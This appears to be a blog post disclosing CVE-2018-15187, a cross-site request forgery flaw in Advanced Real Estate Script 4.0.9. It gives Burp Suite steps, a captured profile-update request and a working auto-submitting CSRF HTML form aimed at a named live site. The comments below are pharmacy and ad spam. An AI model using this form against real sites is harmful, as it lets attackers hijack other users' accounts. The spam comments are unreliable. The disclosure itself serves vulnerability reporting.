Trending

CVE-2018-15187:Advanced Real Estate Script -4.0.9- has CSRF

CVE-2018-15187-Vikas chaudhary

# Exploit Title: Advanced Real Estate Script -4.0.9- has CSRF
# Date: 04.08.2018
# Site Titel : Realestate
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/advanced-real-estate-script/
# Category: Web Application
# Version: 4.0.9
# Exploit Author: Vikas Chaudhary
# Contact: https://gkaim.com/contact-us/
# Web: https://gkaim.com/
# Public on : https://gkaim.com/cve-2018-15187-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE-CVE-2018-15187

*********************
# VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide range of innovative .
PHP Scripts Mall is a leading business and technology firm with 12 years of successful track record in
completion and implementation of numerous projects in various verticals and domains..
It has 300 plus PHP scripts ready to buy.

# DESCRIPTION :- The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
The issue is triggered when an unauthorized input passed via multiple POST and GET parameters are not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context
of an affected site.

*******************************
PoC:-
1- Open Burp Suite =>make intercept on
2- Go to Software link
4- Click on sign up and register in using your mail , password and so on
5- Verify your mail id
6- Come back to site and sign in
7- Go to Dashboard => Edit Profile and rename according you and click on update
8- Burp will Capture the data
9- Gererate CSRF PoC and using CSRF HTML send that to Target. Target account automatically will change according to you

POST /advance-realestate/edit-profile.php HTTP/1.1
Host: thavasu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://thavasu.com/advance-realestate/edit-profile.php
Content-Type: multipart/form-data; boundary=---------------------------118812872911168
Content-Length: 1069
Cookie: PHPSESSID=14599c05c986498421a6ce346c3a5164; wfvt_3989821828=5b650ef0d6313; _ga=GA1.2.224880601.1533349083; _gid=GA1.2.568298385.1533349083
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------118812872911168
Content-Disposition: form-data; name="nam"

Hacker HRFP
-----------------------------118812872911168
Content-Disposition: form-data; name="gender"

Male
-----------------------------118812872911168
Content-Disposition: form-data; name="mobcode"

+43
-----------------------------118812872911168
Content-Disposition: form-data; name="mob"

9090909090
-----------------------------118812872911168
Content-Disposition: form-data; name="countryy"

94
-----------------------------118812872911168
Content-Disposition: form-data; name="statee"

331
-----------------------------118812872911168
Content-Disposition: form-data; name="cityy"

84
-----------------------------118812872911168
Content-Disposition: form-data; name="addr"

Vikas Chaudhary
-----------------------------118812872911168
Content-Disposition: form-data; name="zipp"

123456
-----------------------------118812872911168
Content-Disposition: form-data; name="user_up"


-----------------------------118812872911168--

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://thavasu.com/advance-realestate/edit-profile.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="nam" value="Hacker&#32;&#32;HRFP" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="mobcode" value="&#43;43" />
<input type="hidden" name="mob" value="9090909090" />
<input type="hidden" name="countryy" value="94" />
<input type="hidden" name="statee" value="331" />
<input type="hidden" name="cityy" value="84" />
<input type="hidden" name="addr" value="Vikas&#32;&#32;Chaudhary" />
<input type="hidden" name="zipp" value="123456" />
<input type="hidden" name="user&#95;up" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

4 thoughts on “CVE-2018-15187:Advanced Real Estate Script -4.0.9- has CSRF

  1. Pingback: CVE.report
  2. Levitra Duration Kamagra 100mg Einnahme China Pharmacy Online generic viagra Acheter Vrai Viagra En Ligne En Antibes Is Keflex A Sulfa Drug Commande En Ligne Viagra En Saint viagra Generique Cialis Forum Cialis Malaga Comprar Cialis Oder Viagra Test Effects Of Tadalis Sx Soft Women Buy Prednisone Without Rx cialis 20mg for sale Cialis He Probado Cialis Rush Delivery Viagra Generique Autorise

  3. I have noticed you don’t monetize your page, don’t waste your traffic, you can earn extra bucks every month.
    You can use the best adsense alternative for any type of website
    (they approve all websites), for more details simply search in gooogle: boorfe’s tips monetize your website

Comment Please